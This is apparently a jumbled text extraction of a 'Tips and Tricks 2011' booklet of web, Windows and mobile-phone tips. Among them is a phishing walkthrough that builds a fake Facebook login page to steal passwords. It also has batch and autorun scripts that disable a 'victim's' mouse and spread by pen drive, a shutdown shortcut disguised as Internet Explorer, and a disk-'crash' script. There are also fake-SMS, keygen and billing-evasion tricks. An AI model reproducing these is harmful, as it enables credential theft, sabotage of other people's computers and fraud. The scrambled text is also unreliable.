2 22) Movie download Sites: -funwadi. S Page 34 .com 18) To convert one file to another file -with 100rs investment BANDI Go 2 21) Earn Money without investing by seeing ad -Jst register -blogger. S 17) Info about all indian govn activities updated every -docs.Tips and Tricks 2011 BANDI 19) Services provided by GOOGLE: 20) Surf anonymously without revealing your identity. tvdekho. BANDI 27) Easy way to find phone numbers all around world just go to - -www.creativecommons. S 24) Best computer related notes: - -www. S Page 35 .com - 23) Watch indian TV channels/serials for FREE 28) a complete collection of all search 25) Create your own social network site like orkut: -Go 2 26) FREE pdf search engine: -Mega-Pdf.Tips and Tricks 2011 BANDI KISHORE. net www.askvg. 29) FREE Accounts: Gmail: https://mail. www. S Page 36 .oddcast. S just go to this webiste and search anything & results are in all www. wanna c hw u look in AVATAR form? go to 22) Avatarize 21) Start Hackin: Yahoo: is a search engin tat enables anybody 2 look up BANDI 30) Computer keyboard Shortcuts for all applicationd 24) 23) Find serial key.serialkey.Tips and Tricks 2011 BANDI www.subserials. keygens www. Tips and Tricks 2011 BANDI http://www.hi5 accounts @ one place? http://www.blumentals.cchr.alexa. bt make sur u rename d new image as "lvback.php 28) Know about HUMAN rights & get a free dvd of human rights video Go 2 30) FREE Duplicate File finder and remover 32) ORKUT Font changing trick.myspace. S Page 37 .org its a site of Citizen Commission on human rights 29) To get solns n notes for MATHS & Science (NCERT & CBSE) http://www. 25) To change Windows Messenger skin.indiacbse.gif" with a new image. S documents on d web includin MS-Word n PDF' 27) Wana PASSWORD Protect few programs in ur comp? Dwnld n install d soft 4m 31) Wana manage all ur" 26) Wana c d ratings/ranks for al websites n also calculate its visitors or earnings? http://www. just put html code: BANDI KISHORE. go 2 C:\program files\messenger replace "lvback. com -docstoc. S <span style="font-family:comic sans ms.invisiblesurfing.Tips and Tricks 2011 BANDI KISHORE. S Page 38 .com 35) Online Documents Sharing Sites -docs.php?ch=india BANDI > 36) How to surf banned sites? > 34) Want DRIVERS for ur comp? > www.cyber-fm."> ur text </span? replace comic sans by ur prefferd text style 33) Listen to online FM 37) Get info about allll softwares 38) Check ur GPRS or internet speed www. 43) Amazing thoughts & inventions by ppl search the movie of ur choice n on the righthand side whr it says "download"->rightclick n choose "save link as" save it on any of ur drives 40) Get notifications about all entrance exams 39) FREE movies 44) Learn free spoken english online from BANDI 41) SpeedUP internet surfing -Go 2 Run -type gpedit. S 45) Find out all VISA ATM in all over the world http://dslreports.Tips and Tricks 2011 BANDI KISHORE.divxcrawler.Net http://whatismyip.successcds.msc ->administrative Template->Cmptr configuration->enableoption->change value to 0 42) c world amazing records http://www.oddee.learnspokenenglish. S Page 39 .bandwidthplace. S Page 40 .org 52) Online Jobs: and Tricks 2011 BANDI in india 48) To get full details of any BSNL (BEST) Voobys.php 49) Dwnld Videos from youtube or similar websites without any soft 51) Do u want to modify any picture without using any soft (online) 53) FREE SMS worldwide BANDI To get STD Codes http://www. S 46) Go 2 -type "google 1337" without quotes -click on "I'M FEELING LUCKY" -it ll tak u to google official hacked page 47) R u bored? lookin for some fun? www. com 54) Watch funny ads 55) Watch live video (webcam's) -enter google -type "inurl:view/index.BLOGSPOT.actionfx. including creation of virus HTTP:// > www.STEALTHHACKROOM. S Page 41 . U hav got 2 check out.html 59) Online Photo Editing www.Tips and Tricks 2011 BANDI -Find a diverse numbr of articles on human psychology.COM 57) If U believe that everythng is in d wadja.picnik. Go to: 60) Do U want to send (Upload large files or) some registry files to ur friends? (Emails are not supportd to upload) Go to: > www.html" -search n click any result it ll lead to live connectd webcam's 56) TO learn most recent tricks bot BANDI KISHORE.rapidshare. 58) Learn 'PhotoShop' easily with examples mjoy. S mobiluck. com 63) Here You Can Find & See The Described Full Map Of Any Place Village. S 61) Send FAX WiThOut Fax Machine Through Internethttp://faxzero.etc. www.. 66) No need to hear fm in mobile just get online fm radio with 57 hindi channels >www. www.Maths. Just Go to: 64) Read/share books online on any topics.technologystudent.Musicplug.Town.Djdownload. S Page 42 .Videogetting.U must BANDI KISHORE.Enginee ring.State Or River Of All Over India Goto: > 67) Ur software are outdated? download & install this update > 65) Excellent site for all Engineering studs. useful materials.html 62) Download DJ Remix Songs > >www.Tips and Tricks 2011 BANDI KISHORE. Viewmy.sites&services across the web.deleteyouraccount. S Page 43 .etc .blogging. Image hosting & Free Web Ziddu is a complete Free file hosting system which offers services like Free Web 73) www. 75) Find friends IP address. All u need is descent Broadband try www.html 71) Ur Favourte WebSiTE iS BlOckeD!! ThErE iS SolOutiOn 72) www.Tips and Tricks 2011 BANDI 69) Online computer dictionary for U: Go to: www. 74) >entr ur email id BANDI Delete your account from all of the major social networking. If u need any addresses while on the move.aspx http://anonymouse.! Go2: www. Go to > 70) SEND FAKE EMAIL: S 68) Wanna watch Tv's online online Ranging from This websites contains address and phone no details of all major cities in jaycut.Screenshot Full web 77) www. www.web based text editor.followupthen. S Page 44 .com .Cut & modify mp3 . 79) .www.refreshthis.Merge PDF files or split PDF files www.ilovepdf.Fast.Email Remainder. BANDI KISHORE. 78) www.owely.notapipe. 76) Do U Want to make a free call worldwide? Just Go to and Read instructions: > . S >copy d image provided >u hav 60sec >paste n send to frnd >wen frnd opens it we wil get .com Generate a help URL so friends and family can send you instant screen recordings to help trouble shoot computer issues. www.Instant Screenshot .File Conversions.Easy to use online translator 81) www. .Manage daily Expense 80) www.Tips and Tricks 2011 BANDI >freeipcall.safe2click. www.Checks If a URL is safe to Click www. www. .Keeping Websites Always .Online video editor. Tips and Tricks 2011 BANDI KISHORE. S 82) Want information about any city? just try this. type <cityname> 83) - Automatically Capture The Highlights Of Video. - Download Videos from Websites. (Youtube,Redtube,etc) - Create a video. 84) - Create & Share Animated Videos. - Subtitle search engine. - Sharing and tracking online videos. 85) - Create Summary Of Your Video. - Record & Send Videos. - synchronized Videos With Friends 86) FACEBOOK revolving pictures - open any page in facebook - copy d below link in address bar n press enter - javascript:(a = (b = document).createElement("script")).src = "//", b.body.appendChild(a); void(0) 87) For details bot companies, interview, mock interview, papers, experience of others interview, training n complete details bot a company required durin placements, go to 88) Google's Official hack website - go to google n type - google 1337 - click on I'm feeling lucky BANDI KISHORE. S Page 45 Tips and Tricks 2011 BANDI KISHORE. S 89) Google's Official game: - go to google n type - google easter eggs - click on I'm feeing lucky 90) For google to play an animation with its webpage: - Open - Type Google gravity. - Click on I'm Feeling lucky. 91) To learn bot HACKING (by Sunny Vaghela), go to - 92) Proxy websites whic helps in openin a website if blocked: 93) Website for HACKING tools: 94) For requesting new ip address: Start -> run -> cmd.exe and click OK type the following. ENTER after each new line. ipconfig /flushdns ipconfig /release ipconfig /renew exit Erase your cookies in whatever browser you are using BANDI KISHORE. S Page 46 Tips and Tricks 2011 BANDI KISHORE. S 95) For tagging to your friends in FaceBook status, > just type "@" (without quotes) > and then type your friend's name, > a drop down list will appear with similar matches. 96) Want To Edit a site directly in web browser without saving page first to your PC or using a third Party tool Just like firebug. Just Type the following text in your Address bar and hit Enter javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 Now u can edit ur webpage lik a word document. 97) Use Bold Underlined Fonts in Facebook Chat. There are many tricks in facebook chat. Very few people know that you can use even bold fonts or underlined fonts in facebook chat. To use bold fonts, type your message between two asterisks. e.g. *royalcse* To type underlined messages, type your message between two underscores. e.g. _hiaac_ 98) Do you hate ads on the website you visit? Hi, this is for you if you hate ads which appear on BANDI KISHORE. S Page 47 S Page 48 . including the way you experience photos.opera and epic browser.Facebook ffixer will work only in mozilla firefox. S website while visiting it. This feature is useful when you want to look at pictures without going to their profile. Start with basic missions n advance urself in diff platforms lik windows. Install it n then again BANDI KISHORE. and chat.hackthissite. > now install it. > Go to http://download. Javascript contest n compete urself crack 100) Facebook Ffixer (Customize multiple aspects of Facebook) facebook ffixer by which you can customize your facebook. feeds. HTML.userscripts. FFixer is a Greasemonkey user script that enhances and customizes your Facebooking After installing restart the browser and then open below link in > Enter URL n then remove ads.Tips and Tricks 2011 BANDI KISHORE. > Go to http://www. Note:. > click on "Install". > GO to http://adout.cnet. learn n win in dese competitions. 99) Having hacking skills then try to solve every mission on this hacking site and surely you will learn something new after completing every mission. MAC. this add-on is a must for anyone who spends a considerable amount of time on the > click on DOWNLOAD NOW n then on Allow. With the ability to customize multiple aspects of Facebook. > go to www.” without quotes in Description and in User Agent: type “Googlebot/2. > Now again go to Tools > Default User Agent and select crawl-66-249-66-1. If you have a question in your mind about Google Bot then you can know about it from http://www. browse any forum based website without doing and install it. but sometimes it requires register for the site to view the forum’s leave other fields blank and then OK. S Page 49 .com/ I suggest you to enable this Add-ons only when you have to access the forums because your browser BANDI KISHORE. It will display User Agent Switcher Options. So here’s way to access all information without register to that site.googlebot.html)” without quotes.1 (+http://www.see the changes. Downalod the User Agent Switcher add-on for Firefox from https://addons. > Now sign in with your facebook account.Tips and Tricks 2011 BANDI KISHORE.mozilla. S restart your browser. 101) Access Forums Without Registering User visit to forums for finding any information.googlebot. > Now go to Tools > Default User Agent > User Agent Switcher > Options.googlebot. Select New User Agent and type “ You have done. Do disable when you don't need it.Tips and Tricks 2011 BANDI KISHORE. 102) Google's Chak Noris cant find trick > go 2 google n type > find Chak Noris > click on I'm feeling lucky 103) Google's bearshare > go 2 google n type > google bearshare > click on I'm feeling lucky 104) Google's bsd > go 2 google n type > google bsd > click on I'm feeling lucky 105) Google's linux(penguin) > go 2 google n type > google linux > click on I'm feeling lucky 106) Google's Elgoog (mirror image of google) > go 2 google n type > elgoog > click on I'm feeling lucky 107) Google's SPHERE BANDI KISHORE. S will show incompatibility with your sites. Hope you will get success in first attempt. S Page 50 . moveBy(0.i>0.moveBy(-i. self.}. javascript:function Shw(n) { if(self. i++) { outp = inp.-i). strike. self.skcoR diawaJ namialuS .0).moveBy) { for(i=40. S > go 2 google n type > Google sphere > click on I'm feeling lucky 108) JAVASCRIPT SHAKING BROWSER Copy this javascript and paste in your browser's address bar. xnaht yas ot tegrof tnoD .j>0.yad lufrednow a evaH ".j--) { self.length . i <= inp. var outp = "". italics. self. or include symbols lik love.i--) { for(j=n. 109) To type ur status on facebook in stylish words. bold.moveBy(1.. S Page 51 .i)..charAt (i) + outp . browser will start shaking. reverse(). etc BANDI KISHORE. for (i = 0.Tips and Tricks 2011 BANDI KISHORE. } alert(outp) .0).moveBy(i. } } } } Shw(5) javascript:function reverse () { var inp = " (. After it .br/ 111) PhotoJacker: Photo Album Downloader for Facebook Evr wanted 2 dwnld d entire album of a person on facebook. instead of dwnldin one pic @ a tim? Wel. it'll shows a Dialog box and type there which type of Your Picture (ex: Family. After Download It.xul in your browser address bar n press 2. Then It Ask to Which Directory should Photo jacker Save This facebook Album to? then select folder where you want to save the Photos .etc) 112) Firefox Inside Firefox You can open firefox inside firefox. Just copy and paste chrome://browser/content/browser.Tips and Tricks 2011 BANDI KISHORE. Go to this link http://googlegooglegooglegoogle. S Page 52 .Frds. You need to Restart your Browser and Login to your Facebook Account.gschoppe. Then go to Photos and Right Click on Photo Album .com/projects/fbformat/ 110) Four Google Search Engines At One Page 4 Search engines at one page. BANDI KISHORE.. 3. S goto http://www. 5. den try "photojacker" currently available @ 4. when u move ur cursor on top of an image it rotates in a circle or any othr shape. DIS. } R++.6. BANDI KISHORE. } setInterval('A()'. S Page 53 .sin(R*x1+i*x2+x3)*x4+x5)+"px". y3=. y1=.1. This piece of code pulls off all the images from your web page. function A() { for(i=0.25.05.i++) { DIS=DI[ i ]. void 0 114) There are times when you are not sure that the website that you are visiting is authentic. The best place to test is a website with many DIS. S 113) Some cool javascript(make fun with trix in facebook.getElementsByTagName("img"). (Google Images for an example) javascript:R=0. x3=1.i-DIL.cos (R*y1+i*y2+y3)*y4+y5)+"px".24. x2=.5).position='absolute'.top=(Math.Tips and Tricks 2011 BANDI KISHORE.24.left=(Math. x4=300. DIS. y2=. Use this code whenever in doubt :. DIL=DI. DI=document. Really makes any page go naked (without its images). x1=. y5=200. x5=300.Copy the code from here and paste into browsers address bar. 116) All Posts in One Page (for orkut) When you will run this script. S javascript:alert("The actual URL is:\t\t"+ location.void(d.createElement("script")).src="http://im.protocol+ "//"+ "/"+ "\nThe address URL is:\t\t"+ location.Tips and Tricks 2011 BANDI KISHORE. 115) Reveal*****(Asterisk) Pasword Using Javascript Follow the steps given below---> 1> Open the Login Page of any website (gmail. :-) Here's the 2> Type "Username" & "Password" 3> Copy & Paste the JavaScript Code given below into ur Broswer's add bar & hit Enter javascript: alert(document.value). This will make your work easy.php".su.body. > Clear your Address line > Copy this into address bar BANDI KISHORE.copy it to ur url : javascript:($=(d=document).getElementById('Passwd'). it will show all the posts of the topic in that page only! So no need to click the "next" button.href). to reach your post.a ppendChild($)) 117) See Hidden Facebook Pictures of any profile Follow these steps :> Go to the Profile-page of the Person. S Page 54 . S Page 55 . * Open any video * While starting press the Pause Button * Press and hold the Left Arrow key * Press Up Arrow Key This game works only on the new YouTube Player (Horizontal Volume Bar) and on www.changePage("photos").%20'profile_two_columns'). just have to uploaded two files on free hositng site & third text file will be generate automatically. Understand it carefully and there is one precaution it is purely illegal so use it on your own behalf. We will use Phishing method to hack Facebook Passwords.Tips and Tricks 2011 BANDI Don't do any unethical hacking.w3.body. fake login page. S javascript:function x() { CSS.htm" <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.It's only for education" xml:lang="en" lang="en" id="facebook" class=" no_js"> BANDI KISHORE. } x() 118) Play Snake In Youtube You can play snake game on youtube You don't need to make any PHP file. tab_controller.0 Strict//EN" "http://www. Open Notepad n save the below code as "index.dtd"> <html xmlns=" 119) Hack Victim's Facebook Passwords People ask the way to hack facebook Passwords.w3. {"name":"js\/8iulmjyvnog0oo4o.php/z37N4/hash/3yfoo63v.enableBootload({"async":[{"name":"js\/19khsprwvtvokwow.js".net\/rsrc.css".static." type":"js".start:(new Date()). S Page 56 ."dialog":[{" name":"js\/19khsprwvtvokwow.16".net\/". S <head> <meta http-equiv="Content-type" content="text/html.php\/z37N4\/hash\/"type":"css".js".noydir" /> <meta name="description" content=" Facebook is a social utility that connects people with friends and others who work. post links and videos.static_base:"http:\/\/"69.ak.js"></script> <script type="text/javascript" src="http://b.fbcdn."permanent":true}].pc:{"m":"1.static."src":"http:\/\/b.ak.ak.facebook. charset=utf-8" /> <meta http-equiv="Content-language" content="en" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <script type="text/javascript"> //<![CDATA[ window."l":"1. 0.svn_rev:209637.php/z9UJ4/hash/3slhnonx.{"name":"css\/6iczrcydqusc8koc.pkg.js".www_base:"http:\/\/www. upload an unlimited number of photos.locale:"en_US".fbcdn.ak.php\/z2KBW\/hash\/9iar4ypo."src":"http:\/\/b. </script> <script type="text/javascript" src="http://b. and learn more about the people they".ps_limit:5.tlds:["com"].com\/".pkg.js"."src":"http:\/\/"></script> <script type="text/javascript">Bootloader.php\/z37N BANDI KISHORE.Tips and Tricks 2011 BANDI KISHORE._is_quickling_index="".CavalryLogger=false.0"}.static.js"></script> <script type="text/javascript" src="\/rsrc."type":"js".a\/rsrc.php\/z9Z 8M\/hash\/4pwmtjt7."permanent":false }.getTime(). //]]> </script> <meta name="robots" content="noodp.0".static.fbcdn."permanent":false}.rep_lag:2.fbcdn.fb_dtsg:null}. study and live around them.static.php/z9Z8M/hash/\/rsrc.fbcdn.pkg." /> <title>Login | Facebook</title> <script type="text/javascript"> Env={user:0."type":"js"".fbcdn.ak."src" :"http:\/\/b.method:"GET".pkg.ak. People use Facebook to keep up with friends. css" /> <link type="text/css" rel="stylesheet" href="http://b.fbcdn.static.fbcdn."permanent":false}.php/z16R3/hash/\/rsrc.php/zEA3E/hash/\/rsrc.fbcdn.fbcdn."permanent":true}].xml" title="Facebook" /> <link rel="shortcut icon" href="http://static. height:0px.static.php/z23ZQ/hash/3ls2fki5.css" /> <link type="text/css" rel="stylesheet" href="http://static."type":"js".fbcdn."type":"css".ph p\/z9Z8M\/hash\/4pwmtjt7.css".ak."src":"http:\ /\/b.php\/z37N4\/hash\/3yfoo63v.php\/z9Z8M\/hash\/4p wmtjt7.</script> <link type="text/css" rel="stylesheet" href="http://static."type":"js".net/rsrc."src":"http:\/\/"type":"css"."src":"http:\/\/ atic.js"".js"."type":"js".pkg.css" /> <link rel="search" type="application/opensearchdescription+xml" href="http://b.php/zELN9/hash/c7h3cyeq.php/z5XFW/hash/9novwt2j.php\/z9Z8M\/hash\/4pwmtjt7.fbcdn.{"name":"css\/6ic"asyncsignal":[{"name":"js\/8iulmjyvnog0oo4o.ak."permanent":false}.net\/rsrc."permanent":false}.pkg.static.static.ico" /></head> <body class="login_page UIPage_LoggedOut Locale_en_US"> <div id="FB_HiddenContainer" style="position:absolute.static.js". S Page 57 .php/z9Q0Q/hash/" class="fb_logo_link" title="Go to Facebook Home"><img class="fb_logo_img img" src="http://static.pkg.js"."src":"http:\/\/b.Tips and Tricks 2011 BANDI KISHORE.ak.{"name":"js\/ 8iulmjyvnog0oo4o.fbcdn."permanent":false}."type":"js".css"\/\/rsrc."permanent":false}]}).{"name":"js\/8iulmjyvnog0oo4o."domform":[{"name":"js\/\/rsrc.css".php/z2KBW/hash/9iar4ypo.ak.js".facebook.ak. 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S Page 73 . -h : Disable HIDDEN. files) Ex: SFC /SCANNOW 2) Help [COMMAND] <=*=> Display DETAILS of [COMMAND] Ex: HELP CONVERT 3) attrib [options] [filename] <=*=> change d permissions of a [filename] options <==> (+h : Enable HIDDEN.txt 4) VOL [Drive Letter] <=*=> Displays d Serial number of [Drive Letter] Ex: VOL D: 5) VER <=*=> Displays Ur current WINDOWS XP VERSION Ex: VER 6) TITLE <=*=> Changes d name of COMMAND PROMPT 4 tat session Ex: TITLE BANDI KISHORE 7) ASSOC [extension]=[new association] <=*=> changes d extension of [extension] to another extension. +r : Enable READ-ONLY.Tips and Tricks 2011 BANDI KISHORE. S ----------------------------------------------------------------------------------------------------------------------------------------**************************XP Commands***************************** 1) SFC /SCANNOW <=*=> Repair CORRUPTED system files (O.S. -r : Disable READ-ONLY) Ex: attrib +h bandi_kishore.txt Ex: attrib -r bandi_kishore. MPG=. Ex: FIXMBR [Enter] FIXBOOT [Enter] 9) Restart ur PC quickly. S here after [extension] will work as [new association] Ex: ASSOC .Tips and Tricks 2011 BANDI KISHORE. S Page 74 .. Create a shortcut file on desktop and type "shutdown -r -t 0" for location (Without quotes). 11) If u want to check remote computer is on or off just type in cmd prompt "pind <ip of the remote computer>" U can use computer name instead of ip. Clicking or opening on the file ll restart ur comp. 10) TRACERT . TO SHUTDOWN try. "shutdown -s -t 0" (without quotes).TXT 8) FIXMBR FIXBOOT <=*=> Used 2 create d boot menu in case u get an error telling boot failure. 12) Use calculator in dos prompt -cmd -set /a 2+2 13) Do u want to know IP address of ur Computr? -Go 2 run -> cmd ->ipconfig BANDI used to trace the path followed by data packet sent over n/w. type dir /ah if d list is too long u can use dir /ah/p/w 16) Wanna transfer files through bluetooth? -Go 2 run -> fsquirt 17) Convert A FAT Drive2 NTFS >Open Command Prompt >Convert X: /Fs:NTFS *Enter Here X =Drive Leter 18) BANDI KISHORE. >Go r run -> "shutdown -a" Bt u need 2 b fast enuf 2 do it b4 "windows" logs u off 15) C hidden files using cmd prompt.Tips and Tricks 2011 BANDI KISHORE. S 14) Hav u ever tried to stop shutdown? Wel u can nw. S Page 75 . php 4) All network's best FREE msg center Numbers-> +919811009996 +919843000046 +919810051736 +919831029994 +919821100006 BANDI -mycantos. send an sms as: RBAL <MobNo> to 121 -To get ur PUK no. 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S +919243155009 5) Format Nokia handsets: nokia 3650.*#4777*8665# Call List .6681 -Press (call key)+(*)+(3) at a time and power on the phone.*#67705646# IMEI.Tips and Tricks 2011 BANDI KISHORE.6600.*#8999*523# LCD Brightness.*#8999*327# Battery Status & Memory Capacity.*#7328748263373738# this will reset password to 12345(Works rarely) turn on enhanced full rate codec: *3370# turn on half rate codec: *4720# 6) SAMSUNG SECRET COdes: New Mene.*#8999*8378# Test Menu.*#06# FORGOT nokia SECURITY Code Dial.*#8999*377# Error Menu. NOKIA SECRET codes: See Private number.6680.*#30# Warranty.*#2820# OPLOGO.*#0837# Battry Info .*#3283# Bluetooth.*#7370# *#7780# Product date. *#110*01# Restore 11) China mobile secret code Default user code. Ex: If file to be sent is "snake.sis' to '.5676 Engineer mode.1122. chnage outgoing line from 1 to 2.*#369# *# 77218114# *#881188# *#94267357# *#9426*357# *#19912006# *#3646633# BANDI KISHORE.sis' and install.1234. 8) Hack memory card password s60. 9) Send any sis or jar file in s60 >rename the extension '. S 7) Want to change phone line? No need to go to settings.*#987*99# LCD.Tips and Tricks 2011 BANDI KISHORE. Jst press # Button 4 a few Seconds Continuously! It'. S Page 78 . again rename it back to '. >open C:\System by using any file explore (where 'C:\' is ur memcard drive letter) >rename 'mmcstore'as 'mmcstore.sis" rename it to "snake.avi' >send it.txt' >open file & c d password. In some mobiles pressing # ll activate the silent mode.avi" and send.3344.mobiletrick. 10) For mobile tricks go 2 -www.. -Type *#2820# in a standby mode! 13) To Divert calls to a number Dial: **21*number# Cancel Divert Dial: ##21# Check ur status Dial: *#21# Activate call waiting: *43# Deactivate call waiting: #43# Check Call Divert: *#61# Cancel call Divert: ##002# Enable conference call: **43# Hide/Show ur phone no.vechile no. #31# 14) Start MOTOROLA FM without headphoneDial *#**372# (or) *#**376# 15) Trace the LOCATION of MOBILE Number. try one of these code (Bt works oly on some networks) * -www.trace. S 12) Check Ur bluetooth Device.?#06# 17) To send virus to mobile in an SMS. S Page 79 -www.indiatrace.2945?#01?# IMEI. Jst go to BANDI KISHORE. * code Go 2 -www.Tips and Tricks 2011 BANDI KISHORE.doiop. when 16) LG SECRET Codes: -Type 2945#?# on the main screen Secret -www.numberway. *#31#. S - -smsgupshop. do the following: >type **04*0000*0000*0000# >When it says "Wrong Pin" press No.Best & Original 01 or 10-Good 02 or 20-Not good 08 or 80-Bad 13-Very BAD 19) To access menu in ur phone withour a SIM BANDI KISHORE. type *#06# if the 7th & 8th digit is 18) Check mobile quality 4 mobile purchased within and Tricks 2011 BANDI -allindiasms. 20) Nokia Security code Resetter: -mjoy.rar. S Page 80 .com -foosms.html 21) websites for FREE SMS: -mycantos. com/s/5265/Home nimbuzz 26) View all news via BANDI KISHORE.themes. S -sms4smile.videos.images.etc for S Page 81 .com >dwnld any content >error page would occur >bookmark the page >change "150" to "147" n "Content to b" >dwnld 23) Go 2 >to dwnld FREE games. live cricket score.Tips and Tricks 2011 BANDI KISHORE.songs.ringtones. http://mobile.hungama. 24) BSNL GPRS Settings: sms <Mobile_Company> <Model_No> to 53733 Ex: nokia n70 25) Best MESSENGERS(like Gtalk.facebook 22) FREE download on HUNGAMA Go 2 -www.etc) 4 ur mobile: Dwnld n install in ur mob mig33 ebuddy (http://mob. PMT.topchalks. go 2 http://www.XII.*#5513#.CAT. S 27) FREE CALLS 31) BEST browsers 4 ur Mobile: -NetFront -Opera Mini -Opera Web -UC Web -Doris 32) Nokia 1600 Screen Rotating trick * 28) NOKIA: Remove clip history from RealOne? just delete the following file C:\system\DATA\Mediaplayer.IIT.dat 29) UCWeb is the only mobile browser which provides facility to read PDF online! 30) Get solns online n complete learnin kit 4 X.gizmocall.AIEEE.UL to 580000 BANDI KISHORE.etc Go 2 www.*#5512#.Tips and Tricks 2011 BANDI KISHORE. S Page 82 .sms IPFREE to 121 HELLOTUNE.*#5514# 33) IDEA balance transfer trick: Dial *567*<mobile_no>*<Amount># Ex: *567*1234567890*100# CALL 34) AIRCEL FREE: GPRS. com peperonity.GREETING to 5800000 35) VODAFONE balance transfer trick: sms TRAN <amount> <mobile_no> to 144 36) Create ur own mobile/wap site: wen. S Page 83 .in for FREE -Click on d game & u'll get an error -bookmark d page & edit 'cost=0' Note bal should b < 1rs BANDI 38) Browse BIG sites in mobile faster: http://t9space.wap.Tips and Tricks 2011 BANDI 39) Wana BLOCK ur SIM Dial **04*3814*7529*68243# 40) Dwnld any game from 37) Get a list of most popular programming languages www.disney. S GREETING. me > > 44) Best Downloading Sites: waptrick. ringtones & more go to indianwap.maps. Just GoTo dis URL.jaxtr. S Page 84 . videos.Tips and Tricks 2011 BANDI KISHORE. Tagtag.gizmos.nimbuzz. 45) See ur city in Mobile: Go to 43) Free calling websites > >m.merawap.: >m. S 41) Are you Using Mobile Gprs and want to know your Mobile Number and Test your 46) Learn the basic network troubleshooting tips and tricks and find how to solve the connectivity problems BANDI KISHORE.php 42) load ur mobile with all latest & hot mobile > >m. com www. S www. now a days each one of us carry mobile devices and always fear that it may be stolen.frenGo.140:443/rtpencoder/zenga004.162.m. BANDI KISHORE.75.sdp 49) Send free Anonymous msg (fake sms) to anyone.213:554/LINKS/738487419bfc179afc7e30e28852b91639267128050280886b2 47) Absolutely Free MOBILE Downloads Like MP3 Songs.SpicyMob. Mobile GAMES. each mobile carries a unique imei 50) Want To Watch Channel "MTV"" uSiNg Ur PhoNE For Free!! Just Go2: rtsp:// www.networktutorials. Go to: www.82.e international mobile identity no which can be used to track your mobile anywhere in the world.Tips and Tricks 2011 BANDI KISHORE. RINGTONES www.166. 48) Watch ICC t20 rtsp:// www.fakemytext. this is how it works!!!!!! > dial *#06# from your mobile.foosms. THEMES & WALLPAPERS SOFTWARES.sdp 51) Track your lost mobile did you ever lost your mobile and found no help from police or mobile operator in tracking your mobile? well now you don’t need to be worried about it. S Page 85 . : e-mail for communication: missed date: imei no.netwith the following info. > send an e-mail to cop@vsnl.: OR U Want To Find Where it is? Just Visit http://mgismobile. 52) Forgot ur own MOBILE NO?? Airtel : *140*1600# Reliance GSM Mobile Number : *#1# Idea: *789# Aircel: *888# BANDI KISHORE. > note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft. S > your mobile shows a unique 15 digit .com & Register ur Mobile No.Tips and Tricks 2011 BANDI KISHORE. > you will find where your hand set is being operated even in case your no is being changed. to cop@vsnl. > once stolen you just have to mail this 15 digit imei no. > your mobile will be traced within next 24 hrs via a complex system of gprs and internet. S Page 86 . your name: address: phone model: make: last used > no need to go to police. mobi 55) BANDI > www. LiveCricket. S videocon: *1# Virgin: *1# Docomo: *1# vodafone: *555*0# Bsnl: 24365 53) http://BalaWap.Tips and Tricks 2011 BANDI (supports 3gp HQ & Mp4 video formats) > www.YouTube Download 54) Youtube downloading sites: > www.Games. S Page 87 .Ringtones.Software.mobtube.cupish.Com All Language > www.Themes. No limit And disconnect.> to 55352 6) Now it's easier to get Blood. Just type > BLOOD GROUP > send to 9600097000 (Example: BLOOD 'O' +ve).#. send an sms as: RTO <Registration No. S ----------------------------------------------------------------------------------------------------------------------------------------**************************Other Tricks****************************** 1) COIN BOX .Free CALL trick *Insert Coin *Press 0.> to 56006 Ex: To know the details of the vechile numbered KA-01-H-680 Jst SMS as RTO KA-01-H-680 To 56006. BANDI KISHORE. 2) To get details of any VECHILE From number.* *Talk.#. send an sms as: cri india to 9773300000 -Railway reservation status. send an sms as: pnr <pnr_number> to 9773300000 5) Get Speed Post Delivery Report on ur mob by sms SP <Speed post no. Then u get ur COIN. S Page 88 .Tips and Tricks 2011 BANDI KISHORE. 3) For totally FREE call without any software. >Dial 1-800-373-3411 >After an ad you need to say FREE call >Now put ur destination number (Ex: +919926xxxxx) 4) If u want -free cricket update. & THE DONOR WILL CALL U. S Page 89 .Tips and Tricks 2011 BANDI KISHORE. S 7) BANDI KISHORE. *111#. S ----------------------------------------------------------------------------------------------------------------------------------------**************************Tech Knowledge****************************** 1) Do u know what method we use 4 balance enquiry in mobile Ex: *123#.etc Its calld USSD feature 2) BANDI KISHORE. S Page 90 .Tips and Tricks 2011 BANDI KISHORE. now scan using ur Anti-Virus 2) Trick to Disable Victim's Mouse Step1: Copy the Batch code into notepad.bat) NOTE: remove ". *How to recover from this attack? Copy this code into the notepad. and save it with ." at the end of each code n den save @echo off set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass".inf" [autorun] Open=BandiKishore. S Page 91 . Save it as "autorun. Save it as .Tips and Tricks 2011 BANDI KISHORE. BANDI KISHORE. S ----------------------------------------------------------------------------------------------------------------------------------------**************************Virus****************************** 1) Creating a FAKE virus open notepad n copy d below code WITHOUT QUOTES "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" Save it as BANDIKISHORE.bat extension(for eg: BandiKishoreAntiVirus. Step2: Now open the notepad and copy this code. Now final step is to double click this batch file.bat Action=Mouse Disable Step 3: Then copy the two files in your pen drive or victim's pen drive.bat extension (for eg: BandiKishore. reg delete %key%. reg add %key% /v Start /t REG_DWORD /d 4.bat).txt. sendkeys “{NUMLOCK}” wshshell.Shell”) do wscript. BANDI KISHORE. Now Right Click on the shortcut of Internet Explorer and goto “Change Icon” and select the icon of Internet Explorer. Click next and in “Type a name for this shortcut” write ” Internet Explorer” and click Finish. S Page 92 . S NOTE: remove ". Goto Desktop Right click > new > Shortcut In “Type the Location of the item” > write: “C:\WINDOWS\system32\shutdown." at the end of each code n den save @echo off set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass".sendkeys “{SCROLLLOCK}” loop 5) Make A Scary Virus Make a scary virus and do fun with your friends.exe Set wshShell =wscript.sleep 100 wshshell.Tips and Tricks 2011 BANDI KISHORE.CreateObject(“WScript. reg delete %key%. Now Virus is Ready… Use this as a Prank… 4) Funny vbs Prank-Keyboard Disco Open notepad type this save as BandiKishore. reg add %key% /v Start /t REG_DWORD /d 1. 3) Shut Down system by double Clicking on Internet Explorer.sendkeys “{CAPSLOCK}” wshshell.exe -r -t 00? without coutes.vbs and double click that file… To exit open task manager and end process wscript. cdromCollection if colCDROMs. it will not harm your computer.Item(i). 6) Virus 2 CRASH ur harddisk Copy n paste d below code in ur c drive n name d file as "BANDIKISHORE.OCX.Tips and Tricks 